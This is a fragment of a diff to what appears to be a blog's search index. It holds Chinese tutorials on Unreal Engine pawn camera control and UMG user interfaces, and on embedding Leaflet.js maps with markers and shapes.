    Velocity.X = FMath::Clamp(Value, -1.0f, 1.0f) * MaxSpeed;
    }

    void AMyPawn::MoveRight(float Value)
    {
    Velocity.Y = FMath::Clamp(Value, -1.0f, 1.0f) * MaxSpeed;
    }

    void AMyPawn::LookUp(float Value)
    {
    MouseInput.Y = FMath::Clamp(Value, -1.0f, 1.0f);
    }

    void AMyPawn::LookRight(float Value)
    {
    MouseInput.X = FMath::Clamp(Value, -1.0f, 1.0f);
    }

    511-使用 Controller 控制视野左右旋转

    ​修改 MyPawn.cpp 里的内容,完成视野随鼠标向左右查看的功能(AddControllerYawInput(MouseInput.X);):

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    62
    63
    64
    65
    66
    67
    68
    69
    70
    71
    72
    73
    74
    75
    76
    77
    78
    79
    80
    81
    82
    83
    84
    85
    86
    87
    88
    89
    90
    91
    92
    93
    94
    95
    96
    97
    98
    99
    100
    101
    #include "MyPawn.h"
    #include "Components/StaticMeshComponent.h"
    #include "Camera/CameraComponent.h"
    #include "Components/InputComponent.h"
    #include "GameFramework/SpringArmComponent.h"
    #include "UObject/ConstructorHelpers.h"

    // Sets default values
    AMyPawn::AMyPawn()
    {
    // Set this pawn to call Tick() every frame. You can turn this off to improve performance if you don't need it.
    PrimaryActorTick.bCanEverTick = true;

    // RootComponent = CreateDefaultSubobject<USceneComponent>(TEXT("RootComponent"));
    MyStaticMesh = CreateDefaultSubobject<UStaticMeshComponent>(TEXT("MyStaticMesh"));
    RootComponent = MyStaticMesh;
    MyStaticMesh->SetCollisionProfileName(TEXT("Pawn"));

    static ConstructorHelpers::FObjectFinder<UStaticMesh> StaticMeshAsset(TEXT("StaticMesh'/Engine/EngineMeshes/Sphere.Sphere'"));
    static ConstructorHelpers::FObjectFinder<UMaterialInterface> MaterialAsset(TEXT("Material'/Engine/Tutorial/SubEditors/TutorialAssets/TutorialMaterial.TutorialMaterial'"));
    if (StaticMeshAsset.Succeeded() && MaterialAsset.Succeeded())
    {
    MyStaticMesh->SetStaticMesh(StaticMeshAsset.Object);
    MyStaticMesh->SetMaterial(0, MaterialAsset.Object);
    MyStaticMesh->SetWorldScale3D(FVector(0.5f));
    }

    MySpringArm = CreateDefaultSubobject<USpringArmComponent>(TEXT("MySprintArm"));
    MySpringArm->SetupAttachment(GetStaticMeshComponent());
    MySpringArm->SetRelativeRotation(FRotator(-45.0f, 0.0f, 0.0f));
    MySpringArm->TargetArmLength = 400.0f;
    MySpringArm->bEnableCameraLag = true;
    MySpringArm->CameraLagSpeed = 3.0f;

    MyCamera = CreateDefaultSubobject<UCameraComponent>(TEXT("MyCamera"));
    MyCamera->SetupAttachment(GetRootComponent());

    MyCamera->SetRelativeLocation(FVector(-300.0f, 0.0f, 300.0f));
    MyCamera->SetRelativeRotation(FRotator(-45.0f, 0.0f, 0.0f));
    MyCamera->SetupAttachment(GetSpringArmComponent());

    AutoPossessPlayer = EAutoReceiveInput::Player0;
    bUseControllerRotationRoll = true;
    bUseControllerRotationPitch = true;
    bUseControllerRotationYaw = true;

    MaxSpeed = 300.0f;
    Velocity = FVector::ZeroVector;
    }

    // Called when the game starts or when spawned
    void AMyPawn::BeginPlay()
    {
    Super::BeginPlay();

    }

    // Called every frame
    void AMyPawn::Tick(float DeltaTime)
    {
    Super::Tick(DeltaTime);
    AddActorLocalOffset(Velocity * DeltaTime, true);

    // X, Y, Z 在虚幻的旋转轴对应 Roll, Pitch, Yaw
    AddControllerYawInput(MouseInput.X);

    FRotator NewSpringArmRotation = MySpringArm->GetComponentRotation();
    NewSpringArmRotation.Pitch = FMath::Clamp(NewSpringArmRotation.Pitch += MouseInput.Y, -80.0f, 0.0f);
    MySpringArm->SetWorldRotation(NewSpringArmRotation);
    }

    // Called to bind functionality to input
    void AMyPawn::SetupPlayerInputComponent(UInputComponent* PlayerInputComponent)
    {
    Super::SetupPlayerInputComponent(PlayerInputComponent);

    PlayerInputComponent->BindAxis(TEXT("MoveForward"), this, &AMyPawn::MoveForward);
    PlayerInputComponent->BindAxis(TEXT("MoveRight"), this, &AMyPawn::MoveRight);
    PlayerInputComponent->BindAxis(TEXT("LookUp"), this, &AMyPawn::LookUp);
    PlayerInputComponent->BindAxis(TEXT("LookRight"), this, &AMyPawn::LookRight);
    }

    void AMyPawn::MoveForward(float Value)
    {
    Velocity.X = FMath::Clamp(Value, -1.0f, 1.0f) * MaxSpeed;
    }

    void AMyPawn::MoveRight(float Value)
    {
    Velocity.Y = FMath::Clamp(Value, -1.0f, 1.0f) * MaxSpeed;
    }

    void AMyPawn::LookUp(float Value)
    {
    MouseInput.Y = FMath::Clamp(Value, -1.0f, 1.0f);
    }

    void AMyPawn::LookRight(float Value)
    {
    MouseInput.X = FMath::Clamp(Value, -1.0f, 1.0f);
    }

    png

    这些属性是用于控制 Pawn 的旋转是否受控制器的旋转影响。具体说明如下:

    • bUseControllerRotationRoll:设置为 true 时,表示 Pawn 的 Roll 旋转将受控制器的 Roll 旋转影响。
    • bUseControllerRotationPitch:设置为 true 时,表示 Pawn 的 Pitch 旋转将受控制器的 Pitch 旋转影响。
    • bUseControllerRotationYaw:设置为 true 时,表示 Pawn 的 Yaw 旋转将受控制器的 Yaw 旋转影响。

    当这些属性被设置为 true 时,Pawn 的旋转将由控制器来决定,而不是由组件自身的旋转规则决定。这在某些情况下非常有用,例如第一人称或第三人称视角的角色控制,其中玩家可以通过控制器来旋转角色的方向。

    ]]>
    @@ -2814,7 +2814,7 @@ /posts/Web-Leaflet/ - #map { height: 280px; }

    前言

    ​很久以前,我喜欢用一个名叫 Hexo-tag-map 的插件,但是后来发现这个插件可控性太差,不是很方便就弃用了,现在我们研究一下它的原始库 Leaflet.js 以求更好的可控性!

    资源

    快速开始

    ​引入相关资源:

    <link rel="stylesheet" href="https://unpkg.com/leaflet@1.9.3/dist/leaflet.css"
    integrity="sha256-kLaT2GOSpHechhsozzB+flnD+zUyjE2LlfWPgU04xyI="
    crossorigin=""/>
    <!-- Make sure you put this AFTER Leaflet's CSS -->
    <script src="https://unpkg.com/leaflet@1.9.3/dist/leaflet.js"
    integrity="sha256-WBkoXOwTeyKclOHuWtc+i2uENFpDZ9YPdf5Hf+D7ewM="
    crossorigin=""></script>

    ​对于地图框,还可以自定义 CSS:

    <style>
    #map { height: 280px; }
    </style>

    ​放置地图框以及控制地图框的 JS:

    <div no-fancybox id="map"></div>
    <script type="text/javascript" src="map.js"></script>

    no-fancybox 是为了防止标签被 fancybox 给识别了。

    map.js 里对地图 <div id="map"></div> 一阵操作!

    // 创建一个 Leaflet 地图对象,设置了一些参数,如缩放级别、最大缩放级别、是否可编辑等,并将地图视图移动到指定的经纬度位置。
    var map = L.map('map',
    {
    zoomSnap: 0.1, // 地图的有效缩放级别
    maxZoom: 18, // 最大缩放级别
    // crs: L.CRS.EPSG4326, // 高德不是这个坐标系
    zoomControl: true,
    editable: true,
    // wheelPxPerZoomLevel:60 // 鼠标滚轮缩放 较小的值将使滚轮轮缩放更快
    }).setView([26.078799594917704, 119.29471468823111], 14); // 待显示地点的经纬度和缩放级别

    // 创建一个瓦片图层对象 baseLayer,指定了高德地图的瓦片地址和一些参数,然后将该图层添加到地图中。
    // 目前 http://map.geoq.cn/ArcGIS/rest/services/ChinaOnlineCommunity/MapServer/tile/{z}/{y}/{x} 也是可用的。
    let baseLayer = L.tileLayer("http://webrd0{s}.is.autonavi.com/appmaptile?lang=zh_cn&size=1&scale=1&style=8&x={x}&y={y}&z={z}", {
    attribution: '&copy; 高德地图',
    maxZoom: 18, // 应与 var map 里的 maxZoom 一致,不然显示不出来图片。
    minZoom: 3,
    subdomains: "1234",
    zoom: 3
    });
    map.addLayer(baseLayer);

    // 监听地图的点击事件,当用户点击地图时会输出当前点击的经纬度信息。
    map.on('click', function (event) {
    // console.log(event); // 返回当前点击的所有信息
    let { lat, lng } = event.latlng; // 经纬度信息
    console.log("[" + lat + ", " + lng + "]"); // 输出经纬度信息,便于调试
    });

    // 监听地图的缩放开始事件(zoomstart),当缩放级别发生改变时会输出当前的缩放级别。
    map.on('zoomstart', function () {
    var zoomLevel = map.getZoom();
    console.log(zoomLevel); // 显示缩放等级(好像只能显示滚动之前的)
    });

    // 给某个点做标记
    var marker = L.marker([26.081476491742904, 119.29704755981834]).addTo(map);
    marker.bindPopup("<b>这个地方真是太好玩了!</b><br/>这是屁股树的坐标😍!");

    // 定义路径点的坐标数组
    var latlngs = [
    [26.08009367221409,119.29242494512384],
    [26.080079217568272,119.29223174932305],
    [26.08009367221409,119.29216735072279],
    [26.080310491686973,119.29212978487263],
    [26.080296037067946,119.29162532917066],
    [26.080453431663422,119.29152938351272],
    [26.080381158638648,119.29095499726753],
    [26.07820812885429,119.29081367507568],
    [26.07815030932909,119.29159187052262],
    [26.078212947146778,119.29209635584687]
    ];
    // 创建路径对象并添加到地图上
    var polyline = L.polyline(latlngs, {color: 'green'}).addTo(map);
    polyline.bindPopup("上学去了😭");

    // 定义多边形的边界点坐标数组
    var latlngs = [
    [26.074889884389435,119.2912822984996],
    [26.073579264327183,119.2915720922007],
    [26.073902102248386,119.2926293025549],
    [26.07466823643904,119.29226437715347],
    [26.075150079274067,119.29180822040166]
    ];
    // 创建多边形对象并添加到地图上
    var polygon = L.polygon(latlngs, {color: 'blue'}).addTo(map);
    polygon.bindPopup("乌石山下,白马河旁~");

    // 绘制圆
    var circle = L.circle([26.077862817425885, 119.29212395568047], {
    color: 'red',
    fillColor: '#f03',
    fillOpacity: 0.5,
    radius: 32.6 // 这个单位是米。
    }).addTo(map);
    circle.bindPopup("阿公阿妈家~");

    // 定义矩形的地理边界
    var bounds = [[26.081312674254516, 119.2925756072068], [26.08073449305117, 119.29365965031108]];
    // 创建一个橙色的矩形
    var rectangle = L.rectangle(bounds, {color: "#ff7800", weight: 1}).addTo(map);
    rectangle.bindPopup("就没见它开张过!😠");

    // 创建 SVG,但好像 Popup 不能被点开
    var svgElement = document.createElementNS("http://www.w3.org/2000/svg", "svg");
    svgElement.setAttribute('xmlns', "http://www.w3.org/2000/svg");
    svgElement.setAttribute('viewBox', "0 0 200 200");
    svgElement.innerHTML = '<rect width="200" height="200"/><rect x="75" y="23" width="50" height="50" style="fill:red"/><rect x="75" y="123" width="50" height="50" style="fill:#0013ff"/>';
    var svgElementBounds = [[26.077898151572324, 119.30137317389199], [26.07745968496554, 119.30187226304396]];
    var svg = L.svgOverlay(svgElement, svgElementBounds).addTo(map);

    // 纯 popup
    var popup = L.popup()
    .setLatLng([26.079171783403833, 119.2939243421818])
    .setContent("小迷糊和小小怪最喜欢吃的百姓鲜捞~")
    .openOn(map);

    ​项目演示。点击一些标注可以弹出 popup

    ​可以用 坐标拾取器 | 高德地图 API (amap.com) 获取精确的坐标(注意经纬度是反的),也可以直接在上面的地图上点击,然后从控制窗口中获取想要的坐标。

    ​更多牛逼的功能可以看 Documentation - Leaflet - 一个交互式地图 JavaScript 库 (leafletjs.cn),好像还能玩得挺花。


    ​封装成一个类,以更便捷地实现基本的地图展示功能:

    class LeafletMap {
    constructor(id, coordinate, zoom, marker) {
    this.id = id;
    this.coordinate = coordinate;
    this.zoom = zoom;
    this.marker = marker;
    }

    render() {
    $("#" + this.id).css({height: "280px"});
    $("#" + this.id).css({margin: "5px 0"});
    var map = L.map(this.id,
    {
    zoomSnap: 0.1,
    maxZoom: 18,
    zoomControl: true,
    editable: true,
    }).setView(this.coordinate, this.zoom);

    let baseLayer = L.tileLayer("http://webrd0{s}.is.autonavi.com/appmaptile?lang=zh_cn&size=1&scale=1&style=8&x={x}&y={y}&z={z}", {
    attribution: '&copy; 高德地图',
    maxZoom: 18,
    minZoom: 3,
    subdomains: "1234",
    zoom: 3
    });
    map.addLayer(baseLayer);

    var marker = L.marker(this.coordinate).addTo(map);
    marker.bindPopup(this.marker).openPopup();
    }
    }

    ​调用方法:

    <div no-fancybox id="map_XX"></div>

    <script defer>new LeafletMap("map_XX", [26.XX, 119.XX]
    , 17, "XX").render()</script>
    ]]>
    + #map { height: 280px; }

    前言

    ​很久以前,我喜欢用一个名叫 Hexo-tag-map 的插件,但是后来发现这个插件可控性太差,不是很方便就弃用了,现在我们研究一下它的原始库 Leaflet.js 以求更好的可控性!

    资源

    快速开始

    ​引入相关资源:

    1
    2
    3
    4
    5
    6
    7
    <link rel="stylesheet" href="https://unpkg.com/leaflet@1.9.3/dist/leaflet.css"
    integrity="sha256-kLaT2GOSpHechhsozzB+flnD+zUyjE2LlfWPgU04xyI="
    crossorigin=""/>
    <!-- Make sure you put this AFTER Leaflet's CSS -->
    <script src="https://unpkg.com/leaflet@1.9.3/dist/leaflet.js"
    integrity="sha256-WBkoXOwTeyKclOHuWtc+i2uENFpDZ9YPdf5Hf+D7ewM="
    crossorigin=""></script>

    ​对于地图框,还可以自定义 CSS:

    1
    2
    3
    <style>
    #map { height: 280px; }
    </style>

    ​放置地图框以及控制地图框的 JS:

    1
    2
    <div no-fancybox id="map"></div>
    <script type="text/javascript" src="map.js"></script>

    no-fancybox 是为了防止标签被 fancybox 给识别了。

    map.js 里对地图 <div id="map"></div> 一阵操作!

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    62
    63
    64
    65
    66
    67
    68
    69
    70
    71
    72
    73
    74
    75
    76
    77
    78
    79
    80
    81
    82
    83
    84
    85
    86
    87
    88
    89
    90
    91
    92
    93
    94
    95
    96
    // 创建一个 Leaflet 地图对象,设置了一些参数,如缩放级别、最大缩放级别、是否可编辑等,并将地图视图移动到指定的经纬度位置。
    var map = L.map('map',
    {
    zoomSnap: 0.1, // 地图的有效缩放级别
    maxZoom: 18, // 最大缩放级别
    // crs: L.CRS.EPSG4326, // 高德不是这个坐标系
    zoomControl: true,
    editable: true,
    // wheelPxPerZoomLevel:60 // 鼠标滚轮缩放 较小的值将使滚轮轮缩放更快
    }).setView([26.078799594917704, 119.29471468823111], 14); // 待显示地点的经纬度和缩放级别

    // 创建一个瓦片图层对象 baseLayer,指定了高德地图的瓦片地址和一些参数,然后将该图层添加到地图中。
    // 目前 http://map.geoq.cn/ArcGIS/rest/services/ChinaOnlineCommunity/MapServer/tile/{z}/{y}/{x} 也是可用的。
    let baseLayer = L.tileLayer("http://webrd0{s}.is.autonavi.com/appmaptile?lang=zh_cn&size=1&scale=1&style=8&x={x}&y={y}&z={z}", {
    attribution: '&copy; 高德地图',
    maxZoom: 18, // 应与 var map 里的 maxZoom 一致,不然显示不出来图片。
    minZoom: 3,
    subdomains: "1234",
    zoom: 3
    });
    map.addLayer(baseLayer);

    // 监听地图的点击事件,当用户点击地图时会输出当前点击的经纬度信息。
    map.on('click', function (event) {
    // console.log(event); // 返回当前点击的所有信息
    let { lat, lng } = event.latlng; // 经纬度信息
    console.log("[" + lat + ", " + lng + "]"); // 输出经纬度信息,便于调试
    });

    // 监听地图的缩放开始事件(zoomstart),当缩放级别发生改变时会输出当前的缩放级别。
    map.on('zoomstart', function () {
    var zoomLevel = map.getZoom();
    console.log(zoomLevel); // 显示缩放等级(好像只能显示滚动之前的)
    });

    // 给某个点做标记
    var marker = L.marker([26.081476491742904, 119.29704755981834]).addTo(map);
    marker.bindPopup("<b>这个地方真是太好玩了!</b><br/>这是屁股树的坐标😍!");

    // 定义路径点的坐标数组
    var latlngs = [
    [26.08009367221409,119.29242494512384],
    [26.080079217568272,119.29223174932305],
    [26.08009367221409,119.29216735072279],
    [26.080310491686973,119.29212978487263],
    [26.080296037067946,119.29162532917066],
    [26.080453431663422,119.29152938351272],
    [26.080381158638648,119.29095499726753],
    [26.07820812885429,119.29081367507568],
    [26.07815030932909,119.29159187052262],
    [26.078212947146778,119.29209635584687]
    ];
    // 创建路径对象并添加到地图上
    var polyline = L.polyline(latlngs, {color: 'green'}).addTo(map);
    polyline.bindPopup("上学去了😭");

    // 定义多边形的边界点坐标数组
    var latlngs = [
    [26.074889884389435,119.2912822984996],
    [26.073579264327183,119.2915720922007],
    [26.073902102248386,119.2926293025549],
    [26.07466823643904,119.29226437715347],
    [26.075150079274067,119.29180822040166]
    ];
    // 创建多边形对象并添加到地图上
    var polygon = L.polygon(latlngs, {color: 'blue'}).addTo(map);
    polygon.bindPopup("乌石山下,白马河旁~");

    // 绘制圆
    var circle = L.circle([26.077862817425885, 119.29212395568047], {
    color: 'red',
    fillColor: '#f03',
    fillOpacity: 0.5,
    radius: 32.6 // 这个单位是米。
    }).addTo(map);
    circle.bindPopup("阿公阿妈家~");

    // 定义矩形的地理边界
    var bounds = [[26.081312674254516, 119.2925756072068], [26.08073449305117, 119.29365965031108]];
    // 创建一个橙色的矩形
    var rectangle = L.rectangle(bounds, {color: "#ff7800", weight: 1}).addTo(map);
    rectangle.bindPopup("就没见它开张过!😠");

    // 创建 SVG,但好像 Popup 不能被点开
    var svgElement = document.createElementNS("http://www.w3.org/2000/svg", "svg");
    svgElement.setAttribute('xmlns', "http://www.w3.org/2000/svg");
    svgElement.setAttribute('viewBox', "0 0 200 200");
    svgElement.innerHTML = '<rect width="200" height="200"/><rect x="75" y="23" width="50" height="50" style="fill:red"/><rect x="75" y="123" width="50" height="50" style="fill:#0013ff"/>';
    var svgElementBounds = [[26.077898151572324, 119.30137317389199], [26.07745968496554, 119.30187226304396]];
    var svg = L.svgOverlay(svgElement, svgElementBounds).addTo(map);

    // 纯 popup
    var popup = L.popup()
    .setLatLng([26.079171783403833, 119.2939243421818])
    .setContent("小迷糊和小小怪最喜欢吃的百姓鲜捞~")
    .openOn(map);

    ​项目演示。点击一些标注可以弹出 popup

    ​可以用 坐标拾取器 | 高德地图 API (amap.com) 获取精确的坐标(注意经纬度是反的),也可以直接在上面的地图上点击,然后从控制窗口中获取想要的坐标。

    ​更多牛逼的功能可以看 Documentation - Leaflet - 一个交互式地图 JavaScript 库 (leafletjs.cn),好像还能玩得挺花。


    ​封装成一个类,以更便捷地实现基本的地图展示功能:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    class LeafletMap {
    constructor(id, coordinate, zoom, marker) {
    this.id = id;
    this.coordinate = coordinate;
    this.zoom = zoom;
    this.marker = marker;
    }

    render() {
    $("#" + this.id).css({height: "280px"});
    $("#" + this.id).css({margin: "5px 0"});
    var map = L.map(this.id,
    {
    zoomSnap: 0.1,
    maxZoom: 18,
    zoomControl: true,
    editable: true,
    }).setView(this.coordinate, this.zoom);

    let baseLayer = L.tileLayer("http://webrd0{s}.is.autonavi.com/appmaptile?lang=zh_cn&size=1&scale=1&style=8&x={x}&y={y}&z={z}", {
    attribution: '&copy; 高德地图',
    maxZoom: 18,
    minZoom: 3,
    subdomains: "1234",
    zoom: 3
    });
    map.addLayer(baseLayer);

    var marker = L.marker(this.coordinate).addTo(map);
    marker.bindPopup(this.marker).openPopup();
    }
    }

    ​调用方法:

    1
    2
    3
    4
    <div no-fancybox id="map_XX"></div>

    <script defer>new LeafletMap("map_XX", [26.XX, 119.XX]
    , 17, "XX").render()</script>
    ]]>
    @@ -2841,7 +2841,7 @@ /posts/Software-%E8%B0%8C%E5%98%89%E8%AF%9A%20UE4%20%E6%95%99%E7%A8%8B%EF%BC%8863-68%EF%BC%89/ - 资源

    课程

    ###【UI】01 课:显示图片到屏幕上

    UE

    ​创建一个 Widget Blueprint 类。

    UE

    ​跟 Unity 里的 UI 系统好像……拖一张图调一调参数。

    UE

    ​打开关卡蓝图。

    UE

    ​节点里选择所创建的 Widget Blueprint

    UE

    Add to Viewport 节点即可显示 UI。

    UE

    Add to ViewportAdd to Player Screen 在这里起同样的效果,仅在多人游戏时才会有区别。

    ###【UI】02 课:UI 主菜单制作

    UE

    ​创建一个 Pawn

    UE

    ​往这个 Pawn 里塞一个 Camera

    UE

    ​调整第三人称游戏场景,将 Player 0 交给这个摄像机。

    UE

    ​创建一个 Widget Blueprint 类,设置一个 Vertical Box,里面放上三个按钮,设为 Fill,然后一阵操作。

    UE

    ​此时就可以把按钮的事件整进 Widget Blueprint 类开始写按下按钮时的逻辑了。Get All Actor Of Class 蓝图通信一波,最后将控制权交给小白人。

    UE

    ​退出游戏的逻辑。

    ###【选看】03 课:使用多格式文本块

    UE

    ​创建一个 Widget Blueprint 类。

    UE

    ​创建一个 Data Table

    UE

    ​类别选择 RichTextStyleRow

    UE

    ​给这个 Data Table 加两行。操作一下这两行对应的文字属性。第一行名称最好是 Default

    UE

    ​设置字体时可以打开 Show Engine Content 以获取可用的字体。

    UE

    Widget Blueprint 中创建一个 RichTextBlockText Style Set 选择创建的 Data TableText 里设置为:

    你好啊朋友!

    <CUSTOM>我要把你做成一个玩偶!</>

    ###【UI】04 课:UI 动画和暂停游戏

    UE

    ​创建一个 Widget BlueprintPause,绘制好 UI。

    UE

    ​随便找一个蓝图(角色蓝图/关卡蓝图/自己建的蓝图,只要能接受输入就行),放上按下 Q 显示这个 UI 的逻辑。

    UE

    WorldSettings 里创建一个新的 GameMode 以显示鼠标。

    UE

    WorldSettings 里创建一个新的 PlayerController 以显示鼠标。

    UE

    PlayerController 里将 Enable Click Events 打开。此时即可正确处理 UI。

    UE

    ​接下来实现 UI 动画。左下角创建一个动画 Appear,之后类似 Pr 的方式设置 UI 的关键帧动画。

    UE

    ​UI 蓝图里自定义事件 BeginAnim,触发这个事件时播放动画 Appear

    UE

    ​按下确认按钮时退出游戏。

    UE

    ​按下继续游戏按钮时反方向播放动画,隐藏 UI。

    UE

    ​修改角色蓝图中按下 Q 显示 UI 的逻辑。

    ###【UI】05 课:3D UI 的交互和显示

    UE

    ​创建一个 Widget Blueprint,绘制好 UI,两个 Button一个半透明 Border

    UE

    ​新建一个 Actor 蓝图,设置 Widget Class。里面添加 Widget 节点,Rendering 下的 Blend Mode 选择 Transparent

    UE

    User Interface 大小设与 UI 的大小一致。

    UE

    ​在第一人称人物中,给枪下面安装节点 WidgetInteraction,调整 Transform,可以打开 Show Debug 以便于调试。

    UE

    ​此时 WidgetInteraction 检测到 UI 对象就会显示红点。

    UE

    ​编辑人物蓝图。

    • 新建一个 bool 类型变量 IsFullyAutomatic,用于控制射击方式是全自动/半自动。
    • 定义一个自定义事件 FullyAutomatic_Event,用于蓝图通信以设置 IsFullyAutomatic
    • 定义一个自定义事件 EnableFullyAutomatic_Event,执行这个事件会开火,通过 Set Timer by Function Name 来实现全自动开火,Clear Timer by Function Name 来实现停止开火。
    • Press Pointer KeyRelease Pointer Key,来实现 Widget Interaction 获取到 UI 时鼠标点击事件。

    UE

    ​设置 UI 的蓝图,按下按钮时设置事件。

    UE

    ​要想纯用鼠标控制 3D UI,先自定义一个 PlayerController,应用之并将 EnableClickEvents 给我关了。

    UE

    ​编辑这个 PlayerController 的蓝图,如此绘制之,并将 Interaction Source 设为 Mouse

    UE

    ​新建一个 pawn 类,里面添上 camera 并获取控制权,运行关卡,此时 3D UI 可以正确运行。

    选看

    ###【选看】多个界面切换和局域网联机

    UE

    ​创建三个 Widget Blueprint

    • FindServer 查找服务器 UI。
    • JoinServer 显示服务器信息和加入按钮的 UI,放置在查找服务器 UI 的列表里。
    • MainMenu 主菜单 UI。

    UE

    ​创建两个第三人称关卡:

    • MainMenu 主菜单。
    • GameMap 游戏地图。

    UE

    ​设计 MainMenu 的 UI 如图所示。

    UE

    ​设置 FindServer 的 UI 如图所示,设计一个 ScrollBox 用于存放 JoinServer

    UE

    ​设置 JoinServer 的 UI 如图所示,可以加一个 Size Box 控制 UI 大小。

    UE

    ​将 JoinServer 的 UI 的显示模式设置为 Desired,调整大小至原点。

    UE

    JoinServer 下新建一个 String 类型的变量 Name,设为 publicExpose on Spawn

    UE

    ​将文字与 Name 绑定。

    UE

    JoinServer 下新建一个 Blueprint Session 类型的变量 Server,设为 publicExpose on Spawn

    UE

    ​绘制 MainMenu 下按下创建房间按钮的逻辑。

    • Create Session 是网络联机相关的内容。
    • Open Level 可以切换到名称为 GameMap 的关卡。

    UE

    GameMap 里整俩出生点。

    UE

    MainMapLevel Blueprint 显示 MainMenu 的 UI。

    UE

    ​绘制 MainMenu 下按下打开服务器按钮的逻辑——清除所有 UI,然后显示 UI FindServer

    UE

    ​绘制 MainMenu 下按下打开退出游戏的逻辑 QuitGame

    UE

    ​绘制 FindServer 下按下返回按钮的逻辑——清除所有 UI,然后显示 UI MainMenu

    UE

    FindServer 下定义一个刷新服务器事件 FreshServer_Event

    • Find Sessions 查找可用连接。
    • 如果找到可用服务器,创建 JoinServer 的 UI,设置其变量 ServerName 的值,并将其放在 Scroll Box 的子类。

    UE

    ​创建对象和按下刷新按钮时都可以触发这个事件。

    UE

    ​创建 FindServerCircularThrobberVisibility 属性的绑定。

    UE

    ​绑定的逻辑:如果 Scroll Box 下有子节点,则不显示,否则显示。

    UE

    ​运行游戏时选择 Number of Players2

    UE

    ​开跑!A 加入游戏后,B 就会显示 A 的服务器信息。

    UE

    ​编写 JoinServer 中按下加入按钮的逻辑——JoinSession 即可加入。

    UE

    ​开跑!

    ###【选看】简易版本地存档、读档系统

    UE

    ​创建两个 Widget BlueprintSaveGame_UMG(存档界面)和 SaveGameSlot(存档项)。

    UE

    SaveGameSlot 如此设计。

    UE

    ​ 给 SaveGameSlot 设计两个变量(读档时设置这两个变量),String 类型的 TextVector 类型的 Location,并且都设置 Instance EditableExpose on Spawn

    UE

    ​将 TextBlock 里的 Text 与变量 Text 绑定。

    UE

    ​绘制 SaveGameSlot 里的蓝图,按下 Load_Btn 时执行读档操作,将 Third Person CharacterLocation 设为存档里的 Location

    UE

    ​绘制 SaveGame_UMG 的 UI 界面,其中的 Scroll Box 用于存放存档信息(SaveGameSlot),让信息放不下的时候显示滚动条。

    UE

    ​创建一个 SaveGame 类,命名为 SaveGame_BP

    UE

    SaveGame_BP 里设计两个变量:String 类型的 SaveGameNameVector 类型的 PlayerLocation。并且都是数组。

    UE

    SaveGame_UMG 中将 ScrollBox 设为变量。

    UE

    ​在关卡蓝图/角色蓝图中绘制读档界面的逻辑。

    UE

    ​在关卡蓝图/角色蓝图中绘制按下 Tab 键存档的逻辑。

    UE

    ​存档位置。

    UE

    ​在关卡蓝图/角色蓝图中绘制按下 P 键显示/隐藏读档界面的逻辑。

    UE

    ​开跑!

    ]]>
    + 资源

    课程

    ###【UI】01 课:显示图片到屏幕上

    UE

    ​创建一个 Widget Blueprint 类。

    UE

    ​跟 Unity 里的 UI 系统好像……拖一张图调一调参数。

    UE

    ​打开关卡蓝图。

    UE

    ​节点里选择所创建的 Widget Blueprint

    UE

    Add to Viewport 节点即可显示 UI。

    UE

    Add to ViewportAdd to Player Screen 在这里起同样的效果,仅在多人游戏时才会有区别。

    ###【UI】02 课:UI 主菜单制作

    UE

    ​创建一个 Pawn

    UE

    ​往这个 Pawn 里塞一个 Camera

    UE

    ​调整第三人称游戏场景,将 Player 0 交给这个摄像机。

    UE

    ​创建一个 Widget Blueprint 类,设置一个 Vertical Box,里面放上三个按钮,设为 Fill,然后一阵操作。

    UE

    ​此时就可以把按钮的事件整进 Widget Blueprint 类开始写按下按钮时的逻辑了。Get All Actor Of Class 蓝图通信一波,最后将控制权交给小白人。

    UE

    ​退出游戏的逻辑。

    ###【选看】03 课:使用多格式文本块

    UE

    ​创建一个 Widget Blueprint 类。

    UE

    ​创建一个 Data Table

    UE

    ​类别选择 RichTextStyleRow

    UE

    ​给这个 Data Table 加两行。操作一下这两行对应的文字属性。第一行名称最好是 Default

    UE

    ​设置字体时可以打开 Show Engine Content 以获取可用的字体。

    UE

    Widget Blueprint 中创建一个 RichTextBlockText Style Set 选择创建的 Data TableText 里设置为:

    1
    2
    3
    你好啊朋友!

    <CUSTOM>我要把你做成一个玩偶!</>

    ###【UI】04 课:UI 动画和暂停游戏

    UE

    ​创建一个 Widget BlueprintPause,绘制好 UI。

    UE

    ​随便找一个蓝图(角色蓝图/关卡蓝图/自己建的蓝图,只要能接受输入就行),放上按下 Q 显示这个 UI 的逻辑。

    UE

    WorldSettings 里创建一个新的 GameMode 以显示鼠标。

    UE

    WorldSettings 里创建一个新的 PlayerController 以显示鼠标。

    UE

    PlayerController 里将 Enable Click Events 打开。此时即可正确处理 UI。

    UE

    ​接下来实现 UI 动画。左下角创建一个动画 Appear,之后类似 Pr 的方式设置 UI 的关键帧动画。

    UE

    ​UI 蓝图里自定义事件 BeginAnim,触发这个事件时播放动画 Appear

    UE

    ​按下确认按钮时退出游戏。

    UE

    ​按下继续游戏按钮时反方向播放动画,隐藏 UI。

    UE

    ​修改角色蓝图中按下 Q 显示 UI 的逻辑。

    ###【UI】05 课:3D UI 的交互和显示

    UE

    ​创建一个 Widget Blueprint,绘制好 UI,两个 Button一个半透明 Border

    UE

    ​新建一个 Actor 蓝图,设置 Widget Class。里面添加 Widget 节点,Rendering 下的 Blend Mode 选择 Transparent

    UE

    User Interface 大小设与 UI 的大小一致。

    UE

    ​在第一人称人物中,给枪下面安装节点 WidgetInteraction,调整 Transform,可以打开 Show Debug 以便于调试。

    UE

    ​此时 WidgetInteraction 检测到 UI 对象就会显示红点。

    UE

    ​编辑人物蓝图。

